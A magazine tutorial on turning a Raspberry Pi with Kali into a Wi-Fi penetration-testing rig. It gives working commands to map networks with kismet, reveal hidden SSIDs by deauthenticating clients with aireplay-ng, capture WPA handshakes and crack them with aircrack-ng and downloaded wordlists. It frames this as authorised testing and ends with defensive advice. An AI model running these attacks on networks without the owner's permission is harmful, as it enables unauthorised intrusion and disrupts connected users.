Raspberr y Pi protection!
The best offence is a strong Raspberry Pi defence, cries Nate Drake, as he charges into the fray wielding a tiny single-board PC and his Linux knowledge.
Your Raspberry Pi can be used as much more than a hobbyist’s computer. As a separate machine, you can employ it to improve the security of your home or office network. Over the following pages, you’ll learn how to transform your Pi into a wireless attack platform using the penetration OS Kali, capable of hacking networks.
The Pi can also function as a buffer between your computer and potential malware. For this reason, you’ll also discover how to use it as an ad-blocking DNS server with Pi-hole, and a sanitiser for removing harmful files from USB sticks before you insert them into your PC.
More experienced users may also enjoy our guide on setting up your Pi as a network honeypot. This allows your Pi to masquerade as a full-blown web server complete with dummy files. All activity by hackers is recorded and no changes they make will affect other devices on your network, giving you crucial insight into who wants to access your data.
We start with the subtle art of Wardriving: driving around in a vehicle, while using a computer to search for vulnerable wireless networks to exploit. Wireless hacking software is freely available over the internet. Small computers like the Raspberry Pi are also very easy to power and conceal. As such, Wardrivers no longer require a team of men in a white van to break into wireless networks. Indeed, in recent years there have also been examples of Warcycling and Wardroning.
This guide focuses on how you, as an ethical hacker, can perform penetration tests on routers and IoT devices to make sure they’re less vulnerable to this form of exploitation.
Before we begin, we’d like to offer the usual disclaimer that you should only perform penetration testing on networks with the permission of the owner, even (and especially) if you feel that their security is particularly lax.
As you’re acting legally, there is no particular need to emulate Wardrivers fully by strapping your Pi onto a drone or vehicle. However, we encourage you to partner up with a fellow pen-tester and focus your Wardriving attempts on each other’s networks instead of your own. This will make for a much more realistic test, as you can also see how easy it is for a stranger to gain physical access to the area where their network is based. It’s also a good deal more fun!
At the Wardriver wheel
To get started as a Wardriver, you’ll need require a Raspberry Pi that supports wireless such as the Raspberry Pi 3 or Raspberry Pi Zero W. You’ll also need a microSD card at least 16GB in size to install Kali.
All of the steps outlined below can be run from the command line, so technically you could boot your Pi and connect via SSH from a laptop or similar. However, it makes more sense as a Wardriver to connect your Pi to an external display such as the official Raspberry Pi seven-inch touchscreen display. This will save space, particularly if you install an onscreen keyboard such as matchbox-keyboard.
If you plan to use your Wardriving Pi in a vehicle, consider either connecting it to a portable battery pack or, better yet, to your car’s lighter socket. Whichever power source you use, make sure it matches the Pi’s requirements (5V, 2.5A).
You’ll also need a wireless adaptor that can be connected via USB and is compatible with the aircrack-ng suite, in that it can enter monitoring mode and perform packet injection. When researching this article we used the Racksoy Professional Ralink 5370 (available from Amazon UK for around £6).
If you’re pen-testing your own networks or a friend’s then it’s not very likely you’ll need to map out exactly where they are as you’ll already know! However, Wardrivers sometimes make use of GPS devices when running kismet to be able to locate target networks in their area.
As an ethical hacker, you might also wish to do this in order to seek out rogue Wi-Fi APs in your organisation, which can make your network more vulnerable. There are a number of GPS devices that are compatible. For this article we used the GlobalSat BU-353-S4 USB, which are available for around £30 on Amazon UK.
If you do want to plot Wi-Fi networks, open Terminal on Kali and run apt-get install gpsd gpsd-clients . This installs the basic GPS software. Connect the GPS device to a USB port on the Pi and run dmesg | tail -n 5 to find out where it’s mounted: for example, /dev/ttyUSB0.
Start the GPS Daemon at this location, such as gpsd / dev/ttyUSB0 . Next, edit the kismet configuration file by running nano etc/kismet/kismet.conf. Uncomment the lines gpstype=serial and gpsdevice=/dev/rfcomm0 by removing the # at the start. Replace rfcomm0 with the actual location of the GPS device, for example ttyUSB0 , then press Ctrl+X, Y, then return to save and exit.
Start the GPS device with gpsd /dev/ttyUSB0 , then run kismet -l . You should now see the GPS data displayed in the kismet window.
This is automatically saved to an .netxml file in your home folder. You can use the program giskismet to transform this into a .kml file, which is compatible with map software like GoogleEarth. First install the program with apt-get install giskismet , then run it on the .netxml file: for example, giskismet -x capture1-01.kismet.netxml .
Next, use the command giskismet -q “select * from wireless” -o <filename>.kml to create the .kml file itself.
In the words of GirlsagainstBoys, you can’t fight what you can’t see. This can lead some network managers and home users to think that using a hidden Wi-Fi network will protect them from Wardriving as a hacker would need to know both the name of the wireless network and the password.
Hidden networks are in fact extremely easy to detect. Using Terminal in Kali, simply run airodump-ng <interface> : airodump-ng wlan1mon for example, to list nearby networks. Any hidden networks will be listed, and only the ESSID (network name) is hidden.
Run airodump-ng once again to focus on this specific network using its MAC address, such as airodump-ng -c 1 --bssid CC:61:E5:CE:90:92 wlan1mon . This will list any clients attached to the hidden network.
Finally, follow the steps in the guide to open a new tab in Terminal and try to deauthorise one or more of the devices, adding the -c option to target a specific client. For example: aireplay-ng -0 5 -a C:61:E5:CE:90:92 -c 10:9A:DD:B3:48:0B wlan1mon If you’re successful, when you return to the original airodump-ng Terminal window, you’ll see the name of the hidden Wi-Fi network has now appeared under ‘ESSID’.
When a client connects to a WPA-secured AP (Access Point), it engages in a four-way handshake. The AP initially sends a unencrypted nonce value to the client. The client then generates its own encryption key and nonce, and creates a transient key using its own nonce and the AP’s. It then sends an unencrypted message to the AP containing this key. The AP can then extract the client’s nonce and generate the encryption keys. It messages the client to verify it’s the same device and asks if the client is ready to exchange encryption keys. The client responds and the connection between it and the AP is secured.
This is an oversimplification of how wireless networking operates, but it’s important you understand this in general terms, as capturing the data packets used during handshakes is a crucial first step in breaking into a wireless network.
As you’ll see from the guide ( right), it’s easy to record data packets from a wireless network and capture handshakes. You can, however, increase your network security through using strong Wi-Fi passwords and changing them regularly.
If you follow the steps in the guide to capture data using airodump-ng, you’ll find a data capture file with the extension . cap sitting in the /root/kali home folder capture-01.cap, say.
If the captured data contains handshakes between clients and the target AP, you can perform a dictionary attack on the password using aircrack-ng. This utility works by using a list of common passwords as well as words from the dictionary. You can find a number of popular password lists online, including that used by password cracking utility JohntheRipper, which comes preinstalled in Kali.
To download the John the Ripper password list, open Terminal and run: wget http://downloads.skullsecurity.org/passwords/john.txt. bz2
Extract the file by running bzip2 -d john.txt.bz2 then begin trying to crack the Wi-Fi password with aircrack-ng -w john.txt <capture-file-name> , for example aircrack-ng -w john.txt capture-01.cap .
The Raspberry Pi 3 can check around 500 passwords a second which sounds impressive until you realise password lists can contain millions of words. As aircrack-ng can be run offline, we suggest you transfer the capture file to a desktop machine or use cloud computing to crack the password.
The speed at which you crack the password will also be determined by the quality of the password list. See https:// github.com/danielmiessler/SecLists/tree/master/ Passwords for a more comprehensive list of passwords. Be warned that some of these are well over 100MB.
If the target AP supports WPS, you may be able to break in using the Raspberry Pi alone without capturing or cracking any handshake data. See the Crack WPS with Reaver boxout ( below) for help with this.
Wardriving works best when you’re near the target network (the clue is in the name) and there are few other sources of wireless interference. If you want to make sure your network is safe at a range or find your current wireless card is impractical for pen-testing, consider using a larger antenna ( seetheprevious‘Yesyoucantenna!’boxout).
Even devices that are advertised as Linux compatible and/or you’ve used previously with Kali Linux on a desktop machine may not necessarily work with the version of the
Linux kernel you’re using on the Pi. Make sure to research thoroughly before getting started.
If you boot all devices off a network but are still unable to capture handshakes, you may have more joy by targeting individual clients. See the previously mentioned section on hidden networks for details on how to do this.
Both dictionary and brute force attacks on Wi-Fi passwords will take much longer on the Pi than a regular computer. We suggest you capture your files on the Pi, then transfer them elsewhere, for example to a desktop machine. If you’ve a few shekels to spare, consider cracking WPA2 passwords using cloud computing such as the Amazon Linux AMI, which can attempt dictionary and bruteforce attacks using GPUs, which considerably speeds up the process.
If you’ve been suitably terrified by what you’ve read here make sure to apply what you’ve learned and encourage your friends/clients to use WPA2-AES encryption where possible and disable WPS on all devices. If you discovered any lurking rogue APs, you may also want to ask them to draft up a policy for generating wireless networks in their workplace.
Keep an eye in your area for War Chalking. Inspired by the Hobo signs of yesteryear, these alert fellow Wardrivers to various kinds of networks.
Use software like Google Earth to display the .kml created by giskismet. This is an excellent way to find rogue access points.